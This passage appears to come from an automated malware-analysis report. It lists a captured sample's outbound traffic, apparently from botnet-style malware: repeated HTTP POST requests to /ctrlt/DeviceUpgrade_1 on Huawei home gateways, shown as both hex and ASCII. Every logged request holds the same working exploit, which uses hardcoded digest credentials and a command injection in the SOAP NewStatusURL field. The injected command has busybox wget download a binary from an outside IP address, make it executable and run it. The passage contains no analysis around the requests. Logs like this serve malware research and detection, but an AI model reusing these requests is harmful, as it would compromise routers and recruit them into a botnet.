                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361540079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976854086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951654911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      51192.168.2.1453008102.66.209.7537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.604847908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.934197903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418082952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410089970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362132072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425860882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361491919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976852894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
